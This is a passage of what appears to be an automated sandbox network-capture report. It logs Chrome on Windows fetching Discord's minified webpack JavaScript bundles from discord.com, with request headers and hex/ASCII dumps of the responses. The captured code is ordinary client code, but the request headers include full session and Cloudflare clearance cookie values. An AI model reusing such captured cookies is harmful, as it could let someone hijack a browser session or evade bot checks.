                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 32 32 22 29 2c 69 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 6c 3d 69 28 22 33 37 39 38 33 22 29 2c 72 3d 69 28 22 38 38 34 36 39 31 22 29 2c 6e 3d 69 28 22 36 32 37 34 34 35 22 29 2c 61 3d 69 2e 6e 28 6e 29 2c 73 3d 69 28 22 39 31 37 33 35 31 22 29 2c 6f 3d 69 2e 6e 28 73 29 2c 64 3d 69 28 22 34 34 36 36 37 34 22 29 2c 63 3d 69 28 22 36 36 39 34 39 31 22 29 2c 68 3d 69 28 22 38 31 39 38 35 35 22 29 2c 75 3d 69 28 22 37 37 30 37 38 22 29 2c 66 3d 69 28 22 38 35 31 33 38 37 22 29 2c 78 3d 69 28 22 33 30 38 32 38 39 22 29 2c 67 3d 69 28 22 38 34 31 30 39 38 22 29 2c 6d 3d 69 28 22 33 37 36 35 35 36 22 29 2c 6a 3d 69 28 22 37 31 36 32 34 31 22 29 2c 77 3d 69 28 22 34 30 31 36 34 32 22 29 2c 76 3d 69 28 22 37 36 36 32 37 34 22 29 2c 70 3d 69 28 22 32 36 39
                                                                          Data Ascii: 22"),i("222007");var l=i("37983"),r=i("884691"),n=i("627445"),a=i.n(n),s=i("917351"),o=i.n(s),d=i("446674"),c=i("669491"),h=i("819855"),u=i("77078"),f=i("851387"),x=i("308289"),g=i("841098"),m=i("376556"),j=i("716241"),w=i("401642"),v=i("766274"),p=i("269
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 69 6f 6e 5f 69 64 3f 22 3a 22 2e 63 6f 6e 63 61 74 28 65 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 29 3a 22 22 29 29 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 6c 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 6d 61 70 28 65 3d 3e 7b 76 61 72 20 74 2c 73 3b 6c 65 74 20 6f 3b 6c 65 74 20 64 3d 6e 5b 65 5d 2c 63 3d 64 2e 66 69 6c 74 65 72 28 65 3d 3e 6e 75 6c 6c 21 3d 65 2e 6f 70 65 72 61 74 6f 72 29 2c 66 3d 64 2e 66 69 6e 64 28 65 3d 3e 6e 75 6c 6c 21 3d 65 2e 61 70 70 6c 69 63 61 74 69 6f 6e 29 2c 67 3d 6d 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 65 29 2c 6a 3d 6e 75 6c 6c 3d 3d 66 3f 76 6f 69 64 20 30 3a 66 2e 61 70 70 6c 69 63 61 74 69 6f 6e 2c 77 3d 28 6e 75 6c 6c 3d 3d 6a 3f 76 6f 69
                                                                          Data Ascii: ion_id?":".concat(e.application_id):""));return(0,l.jsx)(l.Fragment,{children:Object.keys(n).map(e=>{var t,s;let o;let d=n[e],c=d.filter(e=>null!=e.operator),f=d.find(e=>null!=e.application),g=m.default.get(e),j=null==f?void 0:f.application,w=(null==j?voi
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 6e 63 61 74 28 69 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 6e 29 29 7d 29 5d 7d 2c 65 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 6c 65 74 20 74 2c 7b 6f 6e 47 65 74 52 6f 6c 65 73 43 6c 69 63 6b 65 64 3a 69 2c 6f 6e 4f 70 65 6e 50 72 6f 66 69 6c 65 3a 6e 2c 65 6c 69 67 69 62 69 6c 69 74 79 53 74 61 74 65 73 3a 61 2c 75 73 65 72 49 64 3a 73 2c 72 6f 6c 65 49 64 3a 6f 2c 63 68 61 6e 6e 65 6c 49 64 3a 63 2c 67 75 69 6c 64 49 64 3a 68 7d 3d 65 3b 72 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 79 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 41 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 50 41 53 53 50 4f 52 54 5f 52 4f 4c 45 5f 50 4f 50 4f 55 54 5f 56 49 45 57 45 44 2c 7b 6f 74 68 65 72 5f 75 73
                                                                          Data Ascii: ncat(i,":").concat(r,":").concat(n))})]},e)})})}function D(e){let t,{onGetRolesClicked:i,onOpenProfile:n,eligibilityStates:a,userId:s,roleId:o,channelId:c,guildId:h}=e;r.useEffect(()=>{y.default.track(A.AnalyticEvents.PASSPORT_ROLE_POPOUT_VIEWED,{other_us


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          353192.168.2.550089162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC975OUTGET /assets/e9e649f003bbece806b1.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=bTmtl68fxZcRIe4Vn8VK6GTbjrx0M3XVXOSTrtRZKmM-1702226722833-0-604800000
                                                                          2023-12-10 16:45:23 UTC971INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 37 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 64 33 63 63 35 64 61 66 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:23 GMTContent-Type: application/javascriptContent-Length: 15764Connection: closeCF-Ray: 8336f53d3cc5dafd-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:23 UTC398INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 35 39 33 39 22 5d 2c 7b 37 35 36 35 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 36 36 20 33 38 27 20 77 69 64 74 68 3d 27 36 36 27 20 68 65 69 67 68 74 3d 27 33 38 27 25 33 45 25 33 43 72 65 63 74 20 78 3d 27 30 27 20 79 3d 27 30 27 20 77 69
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75939"],{75651:function(e,n,t){"use strict";e.exports="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 66 38' width='66' height='38'%3E%3Crect x='0' y='0' wi
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 36 2e 31 32 32 20 35 2e 38 36 34 20 32 35 39 20 35 30 27 20 77 69 64 74 68 3d 27 32 35 39 27 20 68 65 69 67 68 74 3d 27 35 30 27 25 33 45 25 33 43 70 61 74 68 20 66 69 6c 6c 3d 27 25 32 33 30 30 30 30 30 30 27 20 66 69 6c 6c 2d 72 75 6c 65 3d 27 65 76 65 6e 6f 64 64 27 20 64 3d 27 4d 20 36 38 2e 31 32 32 20 31 31 2e 38 36 34 20 4c 20 31 39 32 2e 31 32 32 20 31 31 2e 38 36 34 20 43 20 31 39 33 2e 37 37 39 20 31 31 2e 38 36 34 20 31 39 35 2e 31 32 32 20 31 33 2e 32 30 37 20 31 39 35 2e 31 32 32 20 31 34 2e 38 36 34 20 4c 20 31 39 35 2e 31 32 32 20
                                                                          Data Ascii: "data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='6.122 5.864 259 50' width='259' height='50'%3E%3Cpath fill='%23000000' fill-rule='evenodd' d='M 68.122 11.864 L 192.122 11.864 C 193.779 11.864 195.122 13.207 195.122 14.864 L 195.122
                                                                          2023-12-10 16:45:23 UTC1243INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6c 3d 74 28 22 38 38 34 36 39 31 22 29 2c 73 3d 74 28 22 34 34 36 36 37 34 22 29 2c 69 3d 74 28 22 38 35 31 33 38 37 22 29 2c 61 3d 74 28 22 36 39 37 32 31 38 22 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 6c 65 74 20 6e 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 29 28 5b 61 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 55 73 65 72 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 72 65 61 74 6f 72 5f 69 64 29 2c 5b 65 5d 29 3b 72 65 74 75 72 6e 20 6c 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 6e 75 6c 6c 3d 3d 6e 26 26 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 72 65 61 74 6f 72 5f 69 64 29
                                                                          Data Ascii: ction(){return u}});var l=t("884691"),s=t("446674"),i=t("851387"),a=t("697218");function u(e){let n=(0,s.useStateFromStores)([a.default],()=>a.default.getUser(null==e?void 0:e.creator_id),[e]);return l.useEffect(()=>{null==n&&(null==e?void 0:e.creator_id)
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 74 5d 2c 28 29 3d 3e 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 28 65 29 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 74 3b 73 28 6e 75 6c 6c 21 3d 64 2c 22 45 76 65 6e 74 20 6d 75 73 74 20 62 65 20 64 65 66 69 6e 65 64 22 29 2c 6e 3d 6e 75 6c 6c 21 3d 6e 3f 6e 3a 28 30 2c 72 2e 67 65 74 4e 65 78 74 52 65 63 75 72 72 65 6e 63 65 49 64 49 6e 45 76 65 6e 74 29 28 64 29 3b 6c 65 74 20 6f 3d 28 30 2c 75 2e 64 65 66 61 75 6c 74 29 28 6e 2c 65 29 3b 72 65 74 75 72 6e 20 63 28 64 2c 6f 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 6e 29 7b 6c 65 74 20 74 3d 28 30 2c 75 2e 67 65 74 45 76 65 6e 74 45 78 63 65 70 74 69 6f 6e 29 28 6e 2c 65 2e 69 64 29 3b 72 65 74 75 72 6e 20 63 28 65 2c 74 2c 6e 29 7d
                                                                          Data Ascii: t],()=>a.default.getGuildScheduledEvent(e)))&&void 0!==l?l:t;s(null!=d,"Event must be defined"),n=null!=n?n:(0,r.getNextRecurrenceIdInEvent)(d);let o=(0,u.default)(n,e);return c(d,o,n)}function o(e,n){let t=(0,u.getEventException)(n,e.id);return c(e,t,n)}
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 6c 6c 3d 3d 6e 7c 7c 6e 28 74 29 29 7d 2c 55 3d 28 65 2c 6e 29 3d 3e 7b 73 77 69 74 63 68 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 65 6e 74 69 74 79 5f 74 79 70 65 29 7b 63 61 73 65 20 42 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 45 6e 74 69 74 79 54 79 70 65 73 2e 53 54 41 47 45 5f 49 4e 53 54 41 4e 43 45 3a 72 65 74 75 72 6e 20 41 28 65 2c 6e 29 3b 63 61 73 65 20 42 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 45 6e 74 69 74 79 54 79 70 65 73 2e 56 4f 49 43 45 3a 72 65 74 75 72 6e 20 79 28 65 2c 6e 29 7d 72 65 74 75 72 6e 28 29 3d 3e 7b 7d 7d 2c 62 3d 28 65 2c 6e 29 3d 3e 6e 26 26 5b 42 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 45 6e 74 69 74 79 54 79 70 65 73 2e 53 54 41 47 45 5f 49 4e 53
                                                                          Data Ascii: ll==n||n(t))},U=(e,n)=>{switch(null==e?void 0:e.entity_type){case B.GuildScheduledEventEntityTypes.STAGE_INSTANCE:return A(e,n);case B.GuildScheduledEventEntityTypes.VOICE:return y(e,n)}return()=>{}},b=(e,n)=>n&&[B.GuildScheduledEventEntityTypes.STAGE_INS
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 22 74 6f 70 22 2c 74 6f 6f 6c 74 69 70 43 6f 6c 6f 72 3a 72 2e 54 6f 6f 6c 74 69 70 2e 43 6f 6c 6f 72 73 2e 50 52 49 4d 41 52 59 2c 73 69 7a 65 3a 31 36 2c 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 67 75 69 6c 64 42 61 64 67 65 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 72 2e 43 6c 69 63 6b 61 62 6c 65 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 67 75 69 6c 64 4e 61 6d 65 43 6c 69 63 6b 61 62 6c 65 2c 6f 6e 43 6c 69 63 6b 3a 66 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 72 2e 48 65 61 64 69 6e 67 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 3f 6b 2e 67 75 69 6c 64 4e 61 6d 65 4c 69 6e 6b 61 62 6c 65 3a 6b 2e 67 75 69 6c 64 4e 61 6d 65 2c 76 61 72 69 61 6e 74 3a 22 74 65 78 74 2d 73 6d 2f 6d 65 64 69 75 6d 22 2c 63 68 69 6c 64 72 65 6e 3a 63 2e 6e 61 6d 65
                                                                          Data Ascii: "top",tooltipColor:r.Tooltip.Colors.PRIMARY,size:16,className:k.guildBadge}),(0,l.jsx)(r.Clickable,{className:k.guildNameClickable,onClick:f,children:(0,l.jsx)(r.Heading,{className:o?k.guildNameLinkable:k.guildName,variant:"text-sm/medium",children:c.name
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 28 30 2c 44 2e 64 65 66 61 75 6c 74 29 28 74 2c 73 2c 6e 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 76 3f 28 30 2c 6c 2e 6a 73 78 29 28 67 2e 64 65 66 61 75 6c 74 2c 7b 77 69 64 74 68 3a 31 36 2c 68 65 69 67 68 74 3a 31 36 2c 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 62 75 74 74 6f 6e 49 63 6f 6e 7d 29 3a 28 30 2c 6c 2e 6a 73 78 29 28 66 2e 64 65 66 61 75 6c 74 2c 7b 77 69 64 74 68 3a 31 36 2c 68 65 69 67 68 74 3a 31 36 2c 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 62 75 74 74 6f 6e 49 63 6f 6e 7d 29 2c 47 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 49 4e 44 49 43 41 54 45 5f 52 53 56 50 5d 7d 29 3a 28 30 2c 6c 2e 6a 73 78 29 28 72 2e 42 75 74 74 6f 6e 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 62 75 74
                                                                          Data Ascii: e.stopPropagation(),(0,D.default)(t,s,n)},children:[v?(0,l.jsx)(g.default,{width:16,height:16,className:k.buttonIcon}):(0,l.jsx)(f.default,{width:16,height:16,className:k.buttonIcon}),G.default.Messages.INDICATE_RSVP]}):(0,l.jsx)(r.Button,{className:k.but
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 64 3a 74 2e 69 64 2c 65 76 65 6e 74 50 72 65 76 69 65 77 3a 74 2c 72 65 63 75 72 72 65 6e 63 65 49 64 3a 76 7d 29 2c 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6b 2e 66 6f 6f 74 65 72 43 6f 6e 74 61 69 6e 65 72 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 4d 2c 7b 67 75 69 6c 64 3a 69 2c 63 68 61 6e 6e 65 6c 3a 75 2c 67 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 3a 74 2c 69 73 4d 65 6d 62 65 72 3a 64 7d 29 2c 28 30 2c 6c 2e 6a 73 78 29 28 50 2c 7b 69 73 41 63 74 69 76 65 3a 67 2c 69 73 45 6e 64 65 64 3a 49 2c 69 73 4d 65 6d 62 65 72 3a 64 2c 67 75 69 6c 64 49 64 3a 74 2e 67 75 69 6c 64 5f 69 64 2c 67 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 49 64 3a 74 2e 69 64 2c 72 65 63
                                                                          Data Ascii: d:t.id,eventPreview:t,recurrenceId:v}),(0,l.jsxs)("div",{className:k.footerContainer,children:[(0,l.jsx)(M,{guild:i,channel:u,guildScheduledEvent:t,isMember:d}),(0,l.jsx)(P,{isActive:g,isEnded:I,isMember:d,guildId:t.guild_id,guildScheduledEventId:t.id,rec
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 67 75 69 6c 64 49 64 3a 6c 2c 6f 6e 52 73 76 70 3a 73 2c 2e 2e 2e 72 7d 3d 65 2c 5b 64 2c 6f 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 30 29 2c 63 3d 4e 28 6e 2e 69 64 2c 6e 75 6c 6c 29 2c 66 3d 28 6e 75 6c 6c 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 72 65 73 70 6f 6e 73 65 29 3d 3d 3d 45 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 55 73 65 72 52 65 73 70 6f 6e 73 65 73 2e 49 4e 54 45 52 45 53 54 45 44 2c 67 3d 66 3f 45 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 55 73 65 72 52 65 73 70 6f 6e 73 65 73 2e 55 4e 49 4e 54 45 52 45 53 54 45 44 3a 45 2e 47 75 69 6c 64 53 63 68 65 64 75 6c 65 64 45 76 65 6e 74 55 73 65 72 52 65 73 70 6f 6e 73 65 73 2e 49 4e 54 45 52 45 53 54 45 44 2c 70 3d 67 3d 3d 3d 45 2e 47 75 69 6c 64 53 63 68 65
                                                                          Data Ascii: guildId:l,onRsvp:s,...r}=e,[d,o]=a.useState(0),c=N(n.id,null),f=(null==c?void 0:c.response)===E.GuildScheduledEventUserResponses.INTERESTED,g=f?E.GuildScheduledEventUserResponses.UNINTERESTED:E.GuildScheduledEventUserResponses.INTERESTED,p=g===E.GuildSche


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          354192.168.2.550090162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC981OUTGET /assets/96634.924b7b3f0dc4ee21386b.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=bTmtl68fxZcRIe4Vn8VK6GTbjrx0M3XVXOSTrtRZKmM-1702226722833-0-604800000
                                                                          2023-12-10 16:45:23 UTC969INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 37 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 64 64 38 32 65 33 64 64 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:23 GMTContent-Type: application/javascriptContent-Length: 16271Connection: closeCF-Ray: 8336f53dd82e3dd7-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:23 UTC400INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 39 36 36 33 34 22 5d 2c 7b 35 36 39 32 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 76 61 72 20 69 3d 6c 28 22 38 37 32 37 31 37 22 29 2c 73 3d 6c 28 22 39 31 33 31 34 34 22 29 2c 6e 3d 6c 28 22 36 35 31 30 35 37 22 29 2c 61 3d 6c 28 22 32 39 39 32 38 35 22 29 2c 72 3d 6c 28 22 35 32 33 30 38 36 22 29 2c 75 3d 6c 28 22 32 31 35 32 36 22 29 2c 64 3d 6c 28 22 36
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["96634"],{569272:function(e,t,l){"use strict";l.r(t),l.d(t,{default:function(){return E}});var i=l("872717"),s=l("913144"),n=l("651057"),a=l("299285"),r=l("523086"),u=l("21526"),d=l("6
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3b 73 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 49 46 54 5f 43 4f 44 45 5f 52 45 53 4f 4c 56 45 22 2c 63 6f 64 65 3a 65 7d 29 3b 74 72 79 7b 6c 65 74 20 69 3d 61 77 61 69 74 20 28 30 2c 64 2e 72 65 73 6f 6c 76 65 47 69 66 74 43 6f 64 65 29 28 65 2c 74 2c 6c 29 3b 69 66 28 6e 75 6c 6c 21 3d 69 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 26 26 69 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 21 3d 3d 63 2e 50 52 45 4d 49 55 4d 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 5f 41 50 50 4c 49 43 41 54 49 4f 4e 29 7b 6c 65 74 20 65 3d 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 41 70 70 6c 69 63
                                                                          Data Ascii: ts.length>2&&void 0!==arguments[2]&&arguments[2];s.default.dispatch({type:"GIFT_CODE_RESOLVE",code:e});try{let i=await (0,d.resolveGiftCode)(e,t,l);if(null!=i.application_id&&i.application_id!==c.PREMIUM_SUBSCRIPTION_APPLICATION){let e=a.default.getApplic
                                                                          2023-12-10 16:45:23 UTC1249INData Raw: 72 79 7b 6c 65 74 20 6e 3d 61 77 61 69 74 20 69 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 6f 2e 45 6e 64 70 6f 69 6e 74 73 2e 55 53 45 52 5f 47 49 46 54 5f 43 4f 44 45 5f 43 52 45 41 54 45 2c 62 6f 64 79 3a 7b 73 6b 75 5f 69 64 3a 65 2c 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 70 6c 61 6e 5f 69 64 3a 74 2c 67 69 66 74 5f 73 74 79 6c 65 3a 6c 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 3b 72 65 74 75 72 6e 20 73 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 49 46 54 5f 43 4f 44 45 5f 43 52 45 41 54 45 5f 53 55 43 43 45 53 53 22 2c 67 69 66 74 43 6f 64 65 3a 6e 2e 62 6f 64 79 7d 29 2c 6e 2e 62 6f 64 79 7d 63 61 74 63 68 28 6c 29 7b 73 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79
                                                                          Data Ascii: ry{let n=await i.default.post({url:o.Endpoints.USER_GIFT_CODE_CREATE,body:{sku_id:e,subscription_plan_id:t,gift_style:l},oldFormErrors:!0});return s.default.dispatch({type:"GIFT_CODE_CREATE_SUCCESS",giftCode:n.body}),n.body}catch(l){s.default.dispatch({ty
